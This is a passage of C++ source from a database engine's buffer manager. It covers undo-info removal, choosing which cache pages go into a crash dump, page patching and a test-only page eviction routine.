// record to the log, we will not be stranded without our undo
// info
//
// NOTE: this will also set the dependency for a durable
// commit, but it will not delay the flush of the buffer because
// by the time we get here, the commit record has already been
// flushed
//
// NOTE: the only reason it is safe to modify lgposModify
// without the page latch is because both lgposModify and
// this undo info are preventing the page from being flushed.
// as long as at least one keeps the BF from being flushed,
// we can change the other
FMP* pfmp = &g_rgfmp[ prce->Ifmp() ];
PIB* ppib = prce->Pfucb()->ppib;
if ( ppib->Level() == 1 &&
pfmp->FLogOn() &&
CmpLgpos( &ppib->lgposCommit0, &lgposMax ) != 0 )
{
Assert( !pfmp->Pinst()->m_plog->FLogDisabled() );
BFISetLgposModify( pgnopbf.pbf, ppib->lgposCommit0 );
}
// remove our undo info
BFIRemoveUndoInfo( pgnopbf.pbf, prce, lgposModify );
// unlock the undo info chain
pcrit->Leave();
}
// this page may have versions
else
{
// unlock the undo info chain
pcrit->Leave();
// lock the time dependency chain if the source page has versions
// so that no one can add or remove versions while we are
// looking for our undo info
ENTERCRITICALSECTION ecsDepend( &g_critBFDepend );
// scan all versions of this page
for ( PBF pbfVer = pgnopbf.pbf;
pbfVer != pbfNil;
pbfVer = pbfVer->pbfTimeDepChainNext )
{
// lock this undo info chain
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbfVer ) );
// Page dependencies were removed, so in theory walking the dependency chain
// should leave us on same ifmp & pgno, unless the RCE has been processed
// externally while the DUI lock was released for a moment above, in which case
// prce->PgnoUndoInfo() will be pgnoNull.
Expected( prce->Ifmp() == pbfVer->ifmp );
Expected( prce->PgnoUndoInfo() == pbfVer->pgno || prce->PgnoUndoInfo() == pgnoNull );
// the IFMP / PGNO of the undo info in this RCE has undo info
// on this page
if ( prce->PgnoUndoInfo() == pbfVer->pgno &&
prce->Ifmp() == pbfVer->ifmp )
{
// this BF contains our undo info
RCE* prceT;
for ( prceT = pbfVer->prceUndoInfoNext;
prceT != prceNil && prceT != prce;
prceT = prceT->PrceUndoInfoNext() )
{
}
if ( prceT != prceNil )
{
// if we are removing this undo info as a part
// of a lazy commit, we must depend the page on
// the commit record. this is so that if we
// log the commit record, remove the undo info,
// flush the page, and then crash before flushing
// the commit record to the log, we will not be
// stranded without our undo info
//
// NOTE: this will also set the dependency for
// a durable commit, but it will not delay the
// flush of the buffer because by the time we
// get here, the commit record has already been
// flushed
//
// NOTE: the only reason it is safe to modify
// lgposModify without the page latch is because
// both lgposModify and this undo info are
// preventing the page from being flushed. as
// long as at least one keeps the BF from being
// flushed, we can change the other
FMP* pfmp = &g_rgfmp[ prce->Ifmp() ];
PIB* ppib = prce->Pfucb()->ppib;
if ( ppib->Level() == 1 &&
pfmp->FLogOn() &&
CmpLgpos( &ppib->lgposCommit0, &lgposMax ) != 0 )
{
Assert( !pfmp->Pinst()->m_plog->FLogDisabled() );
BFISetLgposModify( pbfVer, ppib->lgposCommit0 );
}
// remove our undo info
BFIRemoveUndoInfo( pbfVer, prce, lgposModify );
// we're done
break;
}
}
// this RCE doesn't have undo info on this page
else
{
// stop looking on this page
break;
}
}
}
}
// this RCE doesn't have undo info on this page
else
{
// unlock the undo info chain
pcrit->Leave();
}
} // g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf ) == BFHash::errSuccess )
g_bfhash.ReadUnlockKey( &lockHash );
}
// validate OUT args
Assert( prce->PgnoUndoInfo() == pgnoNull );
}
//////////////////////
// Debugger Support
typedef CTable< DWORD_PTR, CPagePointer > CReferencedPages;
inline INT CReferencedPages::CKeyEntry:: Cmp( const DWORD_PTR& dw ) const
{
return (INT)( DwPage() - dw );
}
inline INT CReferencedPages::CKeyEntry:: Cmp( const CReferencedPages::CKeyEntry& keyentry ) const
{
return Cmp( keyentry.DwPage() );
}
#pragma warning( disable : 4509 ) // nonstandard extension used: 'function' uses SEH and 'object' has destructor
void BFIBuildReferencedPageListForCrashDump( CReferencedPages * ptableReferencedPages )
{
CArray< CPagePointer > arrayReferencedPages;
TRY
{
// for each instance...
for ( size_t ipinst = 0; ipinst < g_cpinstMax; ipinst++ )
{
const INST * const pinst = g_rgpinst[ ipinst ];
if ( pinstNil != pinst )
{
// for each session of the instance...
for ( PIB * ppib = pinst->m_ppibGlobal; ppibNil != ppib; ppib = ppib->ppibNext )
{
// for each cursor of the session...
for ( FUCB * pfucb = ppib->pfucbOfSession; pfucbNil != pfucb; pfucb = pfucb->pfucbNextOfSession )
{
void * const pvPage = pfucb->csr.PvBufferForCrashDump();
if ( NULL != pvPage )
{
CPagePointer pagepointer( (DWORD_PTR)pvPage );
// try to add the page to the list, but
// just ignore any errors (it simply
// means that the page won't be included
// in our list of referenced pages)
(void) arrayReferencedPages.ErrSetEntry( arrayReferencedPages.Size(), pagepointer );
}
}
}
}
}
}
EXCEPT( efaExecuteHandler )
{
// set a flag to indicate that we hit some sort
// of fatal error (purely for diagnostic purposes
// so that if someone's looking at a dump that
// should have some referenced pages in it, but
// doesn't, then this flag will tell us if it was
// because some fatal error occurred building up
// the referenced page list)
g_fBFErrorBuildingReferencedPageListForCrashDump = fTrue;
}
// load the table of referenced pages with the array
// of referenced pages, ignoring any errors (it
// simply means that we won't have a list of
// referenced pages to work with)
(void) ptableReferencedPages->ErrCloneArray( arrayReferencedPages );
}
INLINE BOOL FBFIMismatchedVMPageInCrashDump(
const BYTE * const pbPage,
const size_t cbPage,
const BYTE * const pbVMPage,
const size_t cbVMPage )
{
BOOL fMismatch = fFalse;
if ( cbPage > cbVMPage )
{
// database page size greater than VM page size
if ( pbVMPage < pbPage || pbVMPage + cbVMPage > pbPage + cbPage )
{
fMismatch = fTrue;
}
}
else if ( cbPage < cbVMPage )
{
// database page size smaller than VM page size
if ( pbPage < pbVMPage || pbPage + cbPage > pbVMPage + cbVMPage )
{
fMismatch = fTrue;
}
}
else
{
// database page size equal to VM page size
if ( pbPage != pbVMPage )
{
fMismatch = fTrue;
}
}
return fMismatch;
}
ERR
ErrBFIInspectForInclusionInCrashDump(
const IBF ibf,
const JET_GRBIT grbit,
const VOID *pvVMPage,
const size_t cbVMPage,
CReferencedPages &tableReferencedPages,
BOOL *pfIncludeVMPage )
{
ERR err = JET_errSuccess;
TRY
{
const PBF pbf = PbfBFICacheIbf( ibf );
cBFInspectedForInclusionInCrashDump++;
if ( NULL == pbf->pv
|| pbf->fQuiesced
|| pbf->fAvailable
|| JET_errPageNotInitialized == pbf->err
|| errBFIPageFaultPending == pbf->err )
{
// ignore the following types of BF's/pages:
//
// 1) BF's with a NULL pv, which should be impossible
// (since we only inspect BF's up to cbfCacheAddressable) -- but
// we'll handle it just in case I've missed some corner
// cases or something
//
// 2) quiesced BF's or BF's in the avail pool, since
// neither is likely to contain interesting/useful data
//
// 3) uninitialized pages, since we don't care about
// pages that are just all full of zeroes
//
// 4) pages that are currently being faulted in, since the
// state of the buffer is unknown (it's in the midst of
// being filled)
cBFMayBeRemovedFromCrashDump++;
}
// if we see a mismatch between the BF and the VM page
// then don't touch it to be on the safe side
else if ( pvVMPage != NULL &&
FBFIMismatchedVMPageInCrashDump( (BYTE *)pbf->pv, g_rgcbPageSize[pbf->icbBuffer], (BYTE *)pvVMPage, cbVMPage ) )
{
*pfIncludeVMPage = fTrue;
cBFMismatchedVMPageIncludedInCrashDump++;
}
// if the caller asked for dirty pages and this page is dirty
// then include it in the crash dump
else if ( ( grbit & JET_bitDumpCacheIncludeDirtyPages ) != 0 &&
pbf->bfdf > bfdfUntidy ||
( grbit & JET_bitDumpCacheMaximum ) != 0 )
{
*pfIncludeVMPage = fTrue;
cBFDirtiedPageIncludedInCrashDump++;
}
// if the caller asked for cached pages and this page holds
// a valid database page then include it in the crash dump
else if ( ( grbit & JET_bitDumpCacheIncludeCachedPages ) != 0 &&
( pbf->ifmp != ifmpNil || pbf->pgno != pgnoNull ) ||
( grbit & JET_bitDumpCacheMaximum ) != 0 )
{
*pfIncludeVMPage = fTrue;
cBFCachedPageIncludedInCrashDump++;
}
// we always include latched pages in the crash dump
else if ( pbf->sxwl.FLatched() )
{
*pfIncludeVMPage = fTrue;
cBFLatchedPageIncludedInCrashDump++;
}
// we always include referenced pages in the crash dump
else if ( tableReferencedPages.SeekEQ( DWORD_PTR( pbf->pv ) ) )
{
*pfIncludeVMPage = fTrue;
cBFReferencedPageIncludedInCrashDump++;
}
// we always include recently-touched pages in the crash dump
else if ( g_bflruk.FRecentlyTouched( pbf, 2000 ) ) // within 2 seconds
{
*pfIncludeVMPage = fTrue;
cBFRecentlyTouchedPageIncludedInCrashDump++;
}
// we always include pages flagged with an error code in the
// crash dump
//
// BUGBUG: This is not selective enough, weed out non-fatal error cases
else if ( JET_errSuccess != pbf->err &&
errBFIPageNotVerified != pbf->err ) // this error is handled below
{
*pfIncludeVMPage = fTrue;
cBFErrorIncludedInCrashDump++;
}
// want to see pages that have completed IO for now ...
else if ( NULL != pbf->pWriteSignalComplete )
{
*pfIncludeVMPage = fTrue;
cBFIOIncludedInCrashDump++;
}
// if the caller asked for corrupted pages, then
// include all non-verified pages in the crash dump
else if ( ( grbit & JET_bitDumpCacheIncludeCorruptedPages ) != 0 &&
( errBFIPageNotVerified == pbf->err ||
errBFIPageRemapNotReVerified == pbf->err ) ||
( grbit & JET_bitDumpCacheMaximum ) != 0 )
{
*pfIncludeVMPage = fTrue;
cBFUnverifiedIncludedInCrashDump++;
}
// the page may be removed from the crash dump (though
// if the VM page size is greater than the database
// page size, then the VM page may actually end up
// getting included anyway due to other BF's on the
// page requiring inclusion)
else
{
cBFMayBeRemovedFromCrashDump++;
}
}
EXCEPT( efaExecuteHandler )
{
err = ErrERRCheck( JET_errInternalError );
}
return err;
}
ERR ErrBFConfigureProcessForCrashDump( const JET_GRBIT grbit )
{
JET_ERR err = JET_errSuccess;
CReferencedPages tableReferencedPages;
// WARNING: Allocating memory or taking a lock (or more generally calling the OS)
// inside this function (or its children) risks a deadlock. The caller has frozen
// all other threads at arbitrary states; and no lock taken on another thread can
// be released.
// turn off asserts while we preparing a crash dump. this is necessary
// because an assert that happens inside the try/except below will cause
// an infinite loop when we hit ErrERRCheck in the except.
UINT aaOriginal = COSLayerPreInit::SetAssertAction( JET_AssertSkipAll );
if ( grbit & JET_bitDumpUnitTest )
{
// verifies asserts are now ignored
Assert( 0 );
}
// record that the caller has requested that the cache be configured for a
// crash dump
g_tickBFPreparingCrashDump = TickOSTimeCurrent();
// skip early outs for the unit test
if ( !( grbit & JET_bitDumpUnitTest ) && !BoolParam( JET_paramEnableViewCache ) )
{
// if the caller requested the maximum amount of information then we have
// nothing to remove from the crash dump
if ( grbit & JET_bitDumpCacheMaximum )
{
Error( JET_errSuccess );
}
// if the process is already pretty small then don't bother to trim the
// contents of the crash dump
if ( OSMemoryPageWorkingSetPeak() < 100 * 1024 * 1024 )
{
Error( JET_errSuccess );
}
// if the cache is already relatively small then no need to trim
if ( cbfInit < ( 100 * 1024 * 1024 ) / g_cbPageMax )
{
Error( JET_errSuccess );
}
}
// if the cache manager isn't initialized then leave the dump alone
if ( !g_fBFInitialized )
{
Error( ErrERRCheck( JET_errNotInitialized ) );
}
// since we are likely being called in the event of a process crash, we
// must very carefully validate our input data to minimize the chance of
// another crash
if ( OSMemoryPageCommitGranularity() == 0 ||
g_icbCacheMax == icbPageInvalid ||
cbfInit == 0 ||
g_rgpbfChunk == NULL ||
g_cbfChunk == 0 ||
( !BoolParam( JET_paramEnableViewCache ) &&
( g_rgpvChunk == NULL ||
g_cpgChunk == 0 ) ) )
{
Error( ErrERRCheck( JET_errIllegalOperation ) );
}
// build the list of currently-referenced pages
BFIBuildReferencedPageListForCrashDump( &tableReferencedPages );
if ( !BoolParam( JET_paramEnableViewCache ) )
{
// If we are not decommitting, nothing to do in this mode
if ( grbit & JET_bitDumpCacheNoDecommit )
{
Error( JET_errSuccess );
}
// compute the parameters required to walk the cache by VM page
const size_t cbVMPage = OSMemoryPageCommitGranularity();
size_t cbitVMPage;
for ( cbitVMPage = 0; (size_t)1 << cbitVMPage != cbVMPage; cbitVMPage++ );
const size_t cbfVMPage = max( 1, cbVMPage / g_rgcbPageSize[g_icbCacheMax] );
const size_t cpgBF = max( 1, g_rgcbPageSize[g_icbCacheMax] / cbVMPage );
// walk every VM chunk of the cache
//
// we inspect BF's up to cbfInit, as opposed to cbfCacheAddressable,
// in case some BF's beyond cbfCacheAddressable have yet to be
// decommitted, so we will do that now (but in any
// case, we only go up to the first NULL chunk, because
// all chunks beyond that will also be NULL)
for ( size_t iCacheChunk = 0, ibf = 0;
ibf < (size_t)cbfInit && iCacheChunk < cCacheChunkMax && NULL != g_rgpvChunk[ iCacheChunk ];
iCacheChunk++ )
{
const size_t iVMPageMin = (size_t)g_rgpvChunk[ iCacheChunk ] >> cbitVMPage;
const size_t iVMPageMax = iVMPageMin + ( g_cpgChunk * g_rgcbPageSize[g_icbCacheMax] >> cbitVMPage );
BOOL fIncludeVMPage = fFalse;
size_t ipgBF = 0;
// walk every VM page of this chunk
for ( size_t iVMPage = iVMPageMin; ibf < (size_t)cbfInit && iVMPage < iVMPageMax; iVMPage++ )
{
void* const pvVMPage = (void*)( iVMPage << cbitVMPage );
if ( 0 != ipgBF )
{
// if ipgBF is non-zero, it must mean that the
// database page size is greater than the VM page
// size, so whatever we decided for the first VM
// page corresponding to this BF, make the same
// decision for the rest of this BF's VM pages
NULL;
}
else
{
// walk every BF corresponding to this VM page and
// determine if any of them should be included in
// the crash dump
for ( IBF ibfT = ibf; ibfT < cbfCacheAddressable && ibfT < IBF( ibf + cbfVMPage ); ibfT++ )
{
err = ErrBFIInspectForInclusionInCrashDump( ibfT, grbit, pvVMPage, cbVMPage, tableReferencedPages, &fIncludeVMPage );
}
}
// if none of the BFs on this VM page should be included in the
// crash dump then decommit the VM page
//
// NOTE: I really hope we are the only running thread in the
// process at this point. Seriously.
if ( fIncludeVMPage )
{
cBFVMPagesIncludedInCrashDump++;
}
else
{
OSMemoryPageDecommit( pvVMPage, cbVMPage );
cBFVMPagesRemovedFromCrashDump++;
// don't bother tracking cache statistics and performance counters here, we're
// about to crash anyways.
}
// advance our current BF pointer as we walk VM pages
if ( ++ipgBF >= cpgBF )
{
fIncludeVMPage = fFalse;
ipgBF = 0;
ibf += cbfVMPage;
}
}
}
}
else // BoolParam( JET_paramEnableViewCache )
{
BOOL fIncludePage;
for ( IBF ibf = 0; ibf < cbfCacheAddressable; ibf++ )
{
fIncludePage = fFalse;
err = ErrBFIInspectForInclusionInCrashDump( ibf, grbit, NULL, 0, tableReferencedPages, &fIncludePage );
if ( fIncludePage )
{
const PBF pbf = PbfBFICacheIbf( ibf );
OSErrorRegisterForWer( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] );
cBFVMPagesIncludedInCrashDump++;
}
}
}
HandleError:
// note that we completed the crash dump preparation
g_tickBFCrashDumpPrepared = TickOSTimeCurrent();
g_errBFCrashDumpResult = err;
// there are no "fatal" errors here. we will record any errors in the
// dump itself
COSLayerPreInit::SetAssertAction( aaOriginal );
return JET_errSuccess;
}
#pragma warning( default : 4509 ) // nonstandard extension used: 'function' uses SEH and 'object' has destructor
////////////////////////////////
// BFFMP context manipulation
void BFSetBFFMPContextAttached( IFMP ifmp )
{
// flag our FMP context as (re-)attached
//
FMP* pfmp = &g_rgfmp[ ifmp ];
if ( pfmp->FBFContext() )
{
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
if ( pbffmp )
{
pbffmp->fCurrentlyAttached = fTrue;
}
pfmp->LeaveBFContextAsWriter();
}
#ifdef PERFMON_SUPPORT
// scan the cache and fixup stats on the formerly unattached FMP
//
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->ifmp != ifmp )
{
continue;
}
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), pbf->tce, ifmp ) );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
}
PERFOpt( g_cbCacheUnattached -= g_rgcbPageSize[pbf->icbBuffer] );
}
#endif
}
void BFResetBFFMPContextAttached( IFMP ifmp )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
#ifdef PERFMON_SUPPORT
// scan the cache and fixup stats on the formerly attached FMP
//
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->ifmp != ifmp )
{
continue;
}
PERFOpt( cBFCache.Dec( PinstFromIfmp( ifmp ), pbf->tce, ifmp ) );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( ifmp ), pbf->tce ) );
}
PERFOpt( g_cbCacheUnattached += g_rgcbPageSize[pbf->icbBuffer] );
}
#endif
// flag our FMP context as unattached
//
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
if ( pbffmp )
{
Assert( pbffmp );
pbffmp->fCurrentlyAttached = fFalse;
}
pfmp->LeaveBFContextAsWriter();
}
// This API is also used to force good data onto disk, removing database corruption.
ERR ErrBFPatchPage(
__in const IFMP ifmp,
__in const PGNO pgno,
__in_bcount(cbToken) const void * pvToken,
__in const INT cbToken,
__in_bcount(cbPageImage) const void * pvPageImage,
__in const INT cbPageImage )
{
ERR err = JET_errSuccess;
BFLatch bfl;
BFLRUK::CLock lockLRUK;
bool fLockedLRUK = false;
PBF pbf = NULL;
CPAGE cpage;
TraceContextScope tcPatchPage( iorpPatchFix );
// no way to find out the TCE and it doesn't matter in this rare case
tcPatchPage->nParentObjectClass = tceNone;
//
// new page
//
OSTrace(
JET_tracetagBufferManager,
OSFormat( "Patching ifmp:pgno %d:%d", (ULONG)ifmp, pgno ) );
// if we ever get a flood of page patches, consider qosIODispatchBackground or something similar.
Call( ErrBFILatchPage( &bfl, ifmp, pgno, BFLatchFlags( bflfNoFaultFail | bflfNoEventLogging ), bfltWrite, BfpriBFMake( PctFMPCachePriority( ifmp ), (BFTEMPOSFILEQOS)qosIODispatchImmediate ), *tcPatchPage ) );
CallSx( err, wrnBFPageFault );
pbf = (PBF) bfl.dwContext;
// Need a clean page with no oldestBegin0 and no lgposModify because
// we write the patched page to disk
// So imagine a scenario where we try to read the page straight
// from disk, get error, issue page patch request (while page is in
// cache and dirty)
if ( pbf->bfdf > bfdfUntidy )
{
Error( ErrERRCheck( JET_errDatabaseInUse ) );
}
else if ( pbf->bfdf == bfdfUntidy )
{
// To clean a modified the page we must reset the checksum
SetPageChecksum( pbf->pv, CbBFIBufferSize(pbf), databasePage, pbf->pgno );
pbf->bfdf = bfdfClean;
}
Assert( bfdfClean == pbf->bfdf );
// Want a full sized page
BFIRehydratePage( pbf );
// Validate the basic assumptions that must be true on successful w-latch
Enforce( pbf->ifmp == ifmp );
Enforce( pbf->pgno == pgno );
Enforce( FBFICurrentPage( pbf, ifmp, pgno ) );
Enforce( FBFIUpdatablePage( pbf ) );
// Since we know the page is clean, we can reset this. This is an issue that is marked
// in BFIDirtyPage, if this is solved, we should be able to assert the lgposOldestBegin0
// is lgposMax
BFIResetLgposOldestBegin0( pbf );
//
// update / patch the page
//
BOOL fPatched = fFalse;
Call( PagePatching::ErrDoPatch( ifmp, pgno, &bfl, pvToken, cbToken, pvPageImage, cbPageImage, &fPatched ) );
if ( !fPatched )
{
// Ignore patching attempt on page with no active patch request
// Maybe we should error out, but there are tests that depend on
// this not erroring out
goto HandleError;
}
//
// write page
//
// if this BF has a dependency of any kind whatsoever, fail the flush
err = ErrBFITryPrepareFlushPage( pbf, bfltWrite, IOR( iorpPatchFix ), qosIODispatchImmediate, fFalse );
if ( err < JET_errSuccess )
{
Error( ErrERRCheck( JET_errDatabaseInUse ) );
}
BFIAssertReadyForWrite( pbf );
Assert( 0 == CmpLgpos( pbf->lgposModify, lgposMin ) );
Assert( 0 == CmpRbspos( pbf->rbsposSnapshot, rbsposMin ) );
Assert( 0 == CmpLgpos( pbf->lgposOldestBegin0, lgposMax ) );
Call( ErrBFISyncWrite( pbf, bfltWrite, qosIODispatchImmediate, *tcPatchPage ) );
Call( ErrIOFlushDatabaseFileBuffers( ifmp, iofrPagePatching ) );
//
// evict page
//
// note: the BFDirty() inside ::ErrDoPatch() actually clears the err state in the BF, so the evict
// page may be vestigial at this point. but for now, I'll Expected() no err, but maintain the design
// principal that SOMEONE and I (SOMEONE) set out to endeavour to evict the buffer from the cache
// so it would be (A) a well known state via being re-read from disk through the normal path, and (B)
// validate the disk is actually fixed.
Expected( pbf->err >= JET_errSuccess );
// mark this BF as "newly evicted" so that it does not cause cache growth
// when BF is reused
pbf->fNewlyEvicted = fTrue;
// check nothing moved under us
AssertRTL( FBFICurrentPage( pbf, ifmp, pgno ) );
// lock this BF in the LRUK in preparation for a possible eviction
g_bflruk.LockResourceForEvict( pbf, &lockLRUK );
fLockedLRUK = true;
// release write latch, so evict can operate correctly
pbf->sxwl.ReleaseWriteLatch();
// actually evict the page
// Note with no lock, we may evict a completely different page unintentionally ... but
// this is OK because it means the original page was also evicted. Hopefully versioning
// of pages isn't at play here, b/c we shouldn't version a page in a bad/err state.
// note: best effort, may ALSO fail due to LRU-K contention??
err = ErrBFIEvictPage( pbf, &lockLRUK, bfefReasonPatch );
// evict takes the w-latch from us (even on failure) ...
pbf = NULL;
if ( err < JET_errSuccess )
{
Error( ErrERRCheck( JET_errDatabaseInUse ) );
}
HandleError:
if ( err < JET_errSuccess )
{
OSTrace(
JET_tracetagBufferManager,
OSFormat( "Patching ifmp:pgno %d:%d fails with error %d", (ULONG)ifmp, pgno, err ) );
}
if ( pbf )
{
// We own the write latch, we must let it go
pbf->sxwl.ReleaseWriteLatch();
}
if ( fLockedLRUK )
{
// unlock the LRUK
g_bflruk.UnlockResourceForEvict( &lockLRUK );
}
return err;
}
// this code evicts the specified ifmp / pgno from the cache
// NOTE: This API is not designed to be used by production code!
ERR ErrBFTestEvictPage( _In_ const IFMP ifmp, _In_ const PGNO pgno )
{
ERR err = errCodeInconsistency;
OSTrace( JET_tracetagBufferManager, OSFormat( "Test Evicting ifmp:pgno %d:%d", (ULONG)ifmp, pgno ) );
// There is no fixed path to guarantee an eviction of a page due to the locking order
// of the BF latch and g_bfhash. So we will throw brute force at the effort, trying to
// evict it in a loop repetitively (waiting 10 ms between).
ULONG iIter = 0;
TICK tickStart = TickOSTimeCurrent();
do
{
// First we need to find the pbf that we think holds this ifmp:pgno ...
BFHash::CLock lockHash;
PGNOPBF pgnopbf;
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lockHash );
BFHash::ERR errHash = g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf );
g_bfhash.ReadUnlockKey( &lockHash );
Assert( errHash == BFHash::ERR::errSuccess || errHash == BFHash::ERR::errEntryNotFound );
if( errHash == BFHash::ERR::errEntryNotFound )
{
// Prescient eviction! We evicted it before we even needed to evict it, VERY efficient.
err = JET_errSuccess;
break;
}
if( errHash == BFHash::ERR::errSuccess ) // only on success, just in case
{
// Ok, we should have the BF we want in pbf
// note: since we released the g_bfhash read lock, there is absolutely
// no protection for this path to not AV during term. We are leaving
// it in the hands of the test code to avoid calling the evict data
// API concurrent with term.
//Assert( FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) );
Assert( pgnopbf.pbf->ifmp == ifmp &&
pgnopbf.pbf->pgno == pgno &&
pgnopbf.pbf->fCurrentVersion );
// Lock this BF in the LRUK in preparation for a possible eviction.
BFLRUK::CLock lockLRUK;
g_bflruk.LockResourceForEvict( pgnopbf.pbf, &lockLRUK );
// Now we need to re-acquire the g_bfhash to check we still have the right
// BF (sigh, rank violation avoidance)
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lockHash );
errHash = g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf );
g_bfhash.ReadUnlockKey( &lockHash );
if( errHash != BFHash::ERR::errSuccess )
{
// Fortuitous eviction! someone evicted it while we were thinking of evicting it
Assert( errHash == BFHash::ERR::errEntryNotFound );
err = JET_errSuccess;
}
else // errHash != BFHash::errSuccess
{
// Actually evict the page
// Note: best effort, may fail due to latch or LRU-K contention??
err = ErrBFIEvictPage( pgnopbf.pbf, &lockLRUK, bfefReasonTest );
// Note: evict releases the g_bfhash write lock
if ( err < JET_errSuccess )
{
if ( err == errBFIPageDirty )
{
// note: in case it comes up, this is an untested code path ...
CBFIssueList bfil;
// could not evict the page, flush the page instead
(void)ErrBFIFlushPage( pgnopbf.pbf, IOR( iorpDirectAccessUtil, iorfForeground ), qosIODispatchImmediate, bfdfDirty, fFalse /* default */, NULL );
CallS( bfil.ErrIssue() );
// hopefully we made some progress, sleep a little to give flush a chance to work
UtilSleep( cmsecWaitIOComplete );
}
}
else
{
// we supposedly succeeded, but the pbf may have converted to an older version
// while we didn't have it locked under the BF hash (thus thwarting our attempt
// to actually evict the current version page from the cache) so we'll set the error to
// JET_errDatabaseInUse below to force re-evaluation, but we don't want to
// waste a retry attempt.
iIter--;
}
// always force retry.
err = ErrERRCheck( JET_errDatabaseInUse );
}
// unlock the LRUK
g_bflruk.UnlockResourceForEvict( &lockLRUK );
}
iIter++;
}
while ( err == JET_errDatabaseInUse && ( iIter < 10 || DtickDelta( tickStart, TickOSTimeCurrent() ) < 300 ) );
if ( err < JET_errSuccess )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Evicting ifmp:pgno %d:%d fails with error %d", (ULONG)ifmp, pgno, err ) );
}
return err;
}
///////////////////////////////////////////////////////////////////////////////
//
// BF Internal Functions
//
///////////////////////////////////////////////////////////////////////////////
//////////////////////////////
// Buffer Manager Global Flags
BOOL g_fBFInitialized = fFalse;
BYTE* g_rgbBFTemp = NULL;
TICK g_tickBFPreparingCrashDump;
size_t cBFInspectedForInclusionInCrashDump;
size_t cBFMismatchedVMPageIncludedInCrashDump;
size_t cBFDirtiedPageIncludedInCrashDump;
size_t cBFCachedPageIncludedInCrashDump;
size_t cBFLatchedPageIncludedInCrashDump;
size_t cBFReferencedPageIncludedInCrashDump;
size_t cBFRecentlyTouchedPageIncludedInCrashDump;
size_t cBFErrorIncludedInCrashDump;
size_t cBFIOIncludedInCrashDump;
size_t cBFUnverifiedIncludedInCrashDump;
size_t cBFMayBeRemovedFromCrashDump;
size_t cBFVMPagesIncludedInCrashDump;
size_t cBFVMPagesRemovedFromCrashDump;
TICK g_tickBFCrashDumpPrepared;
ERR g_errBFCrashDumpResult;
BOOL g_fBFErrorBuildingReferencedPageListForCrashDump = fFalse;
/////////////////////////////////////
// Buffer Manager Global Constants
double g_dblBFSpeedSizeTradeoff;
//////////////////////////////////////
// Buffer Manager Global Statistics
ULONG cBFOpportuneWriteIssued;
//////////////////////////
// IFMP/PGNO Hash Table
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFHash g_bfhash( rankBFHash );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg()
#endif // MINIMAL_FUNCTIONALITY
double g_dblBFHashLoadFactor;
double g_dblBFHashUniformity;
////////////////
// Avail Pool
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFAvail g_bfavail;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg()
#endif // MINIMAL_FUNCTIONALITY
////////////////
// Quiesced List
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFQuiesced g_bfquiesced;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg()
#endif // MINIMAL_FUNCTIONALITY
//////////
// LRUK
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFLRUK g_bflruk( rankBFLRUK );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg()
#endif // MINIMAL_FUNCTIONALITY
double g_csecBFLRUKUncertainty;
/////////////////////
// BF FTL tracing
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
CFastTraceLog* g_pbfftl = NULL;
#endif // MINIMAL_FUNCTIONALITY
IOREASON g_iorBFTraceFile( iorpOsLayerTracing );
class CFileSystemConfiguration : public CDefaultFileSystemConfiguration
{
public:
CFileSystemConfiguration()
{
m_dtickAccessDeniedRetryPeriod = 500;
}
} g_fsconfigBFIFTL;
ERR ErrBFIFTLInit()
{
ERR err = JET_errSuccess;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
WCHAR wszPath[IFileSystemAPI::cchPathMax];
Assert( g_pbfftl == NULL );
Alloc( g_pbfftl = new CFastTraceLog( NULL, &g_fsconfigBFIFTL ) );
//#define BFFTL_TRACE_ALWAYS_ON
#ifdef BFFTL_TRACE_ALWAYS_ON
OSStrCbCopyW( wszPath, sizeof(wszPath), L".\\bftracer.ftl" );
if ( fTrue )
#else
if ( FOSConfigGet_( L"BF", L"FTL Trace File", wszPath, sizeof(wszPath) )
&& wszPath[0] )
#endif
{
err = g_pbfftl->ErrFTLInitWriter( wszPath, &g_iorBFTraceFile, CFastTraceLog::ftlifReOpenExisting );
